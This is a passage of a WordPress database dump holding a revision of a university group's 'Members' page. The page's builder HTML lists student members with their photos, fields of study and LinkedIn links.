h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1347.656 445.313c0 11.719 0 26.367 0 38.086 0 407.227-310.547 875.977-875.977 875.977-172.852 0-336.914-49.805-471.68-137.695 23.438 2.93 49.805 2.93 73.242 2.93 143.555 0 278.32-46.875 383.789-131.836-134.766 0-249.023-90.82-290.039-213.867 20.508 5.859 38.086 5.859 58.594 5.859 29.297 0 55.664-2.93 82.031-8.789-140.625-29.297-246.094-155.273-246.094-301.758 0-2.93 0-2.93 0-5.859 41.016 23.438 87.891 38.086 137.695 38.086-82.031-52.734-137.695-149.414-137.695-254.883 0-55.664 17.578-108.398 43.945-155.273 149.414 187.5 377.93 310.547 632.813 322.266-5.859-23.438-8.789-46.875-8.789-70.313 0-169.922 137.695-307.617 307.617-307.617 90.82 0 169.922 38.086 225.586 96.68 70.313-14.648 137.695-38.086 196.289-73.242-23.438 70.313-73.242 131.836-134.766 169.922 61.523-8.789 120.117-23.438 175.781-49.805-41.016 61.523-93.75 117.188-152.344 161.133z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c158-outer\">\n            <div data-colibri-id=\"182-c158\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c158 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c159\" class=\"d-block style-922 style-local-182-c159 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Bhavya-scaled-1.jpg\" class=\"wp-image-776 style-922-image style-local-182-c159-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-922-frameImage style-local-182-c159-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c160\" class=\"h-global-transition-all h-heading style-914 style-local-182-c160 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c160\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Bhavya Busireddy</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c161\" class=\"h-text h-text-component style-915 style-local-182-c161 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c162\" class=\"style-923 style-local-182-c162 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/bhavya-busireddy-b052b192/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c163-outer\">\n            <div data-colibri-id=\"182-c163\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c163 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c164\" class=\"d-block style-913 style-local-182-c164 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Vineeth.jpg\" class=\"wp-image-831 style-913-image style-local-182-c164-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c164-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c165\" class=\"h-global-transition-all h-heading style-914 style-local-182-c165 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c165\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Vineeth Kumar Chandha</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c166\" class=\"h-text h-text-component style-915 style-local-182-c166 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c167\" class=\"style-917 style-local-182-c167 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/vineeth-kumar-chandha-207611149/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c168-outer\">\n            <div data-colibri-id=\"182-c168\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c168 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c169\" class=\"d-block style-913 style-local-182-c169 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-sathwik-2-scaled-1.jpg\" class=\"wp-image-1007 style-913-image style-local-182-c169-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c169-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c170\" class=\"h-global-transition-all h-heading style-914 style-local-182-c170 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c170\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sathwik Chowda</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c171\" class=\"h-text h-text-component style-915 style-local-182-c171 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c172\" class=\"style-917 style-local-182-c172 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/sathwikchowda/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c173-outer\">\n            <div data-colibri-id=\"182-c173\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c173 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c174\" class=\"d-block style-913 style-local-182-c174 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Brindal-1.jpeg\" class=\"wp-image-1599 style-913-image style-local-182-c174-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c174-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c175\" class=\"h-global-transition-all h-heading style-914 style-local-182-c175 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c175\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Brindal Dhol</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c176\" class=\"h-text h-text-component style-915 style-local-182-c176 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c177\" class=\"style-917 style-local-182-c177 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/brindaldhol/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c178-outer\">\n            <div data-colibri-id=\"182-c178\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c178 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c179\" class=\"d-block style-913 style-local-182-c179 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-ruby_parcells-scaled-1.jpg\" class=\"wp-image-853 style-913-image style-local-182-c179-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c179-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c180\" class=\"h-global-transition-all h-heading style-914 style-local-182-c180 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c180\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Ruby Parcells</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c181\" class=\"h-text h-text-component style-915 style-local-182-c181 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c182-outer\">\n            <div data-colibri-id=\"182-c182\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c182 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c183\" class=\"d-block style-913 style-local-182-c183 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Reshmanjali-1.jpeg\" class=\"wp-image-1600 style-913-image style-local-182-c183-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c183-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c184\" class=\"h-global-transition-all h-heading style-914 style-local-182-c184 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c184\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sai Reshmanjali</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c185\" class=\"h-text h-text-component style-915 style-local-182-c185 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c186\" class=\"style-917 style-local-182-c186 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/reshmanjali-guntupalli/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c187-outer\">\n            <div data-colibri-id=\"182-c187\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c187 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c188\" class=\"d-block style-913 style-local-182-c188 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Bronson.png\" class=\"wp-image-817 style-913-image style-local-182-c188-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c188-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c189\" class=\"h-global-transition-all h-heading style-914 style-local-182-c189 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c189\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Bronson Tharpe</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c190\" class=\"h-text h-text-component style-915 style-local-182-c190 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c191\" class=\"style-917 style-local-182-c191 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/bronson-tharpe-9b754a1ba/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','Members','','inherit','closed','closed','','182-revision-v1','','','2023-10-12 16:48:27','2023-10-12 20:48:27','',182,'https://gsudice.dataconn.net/?p=1684',0,'revision','',0),(1685,1,'2023-10-12 16:48:27','2023-10-12 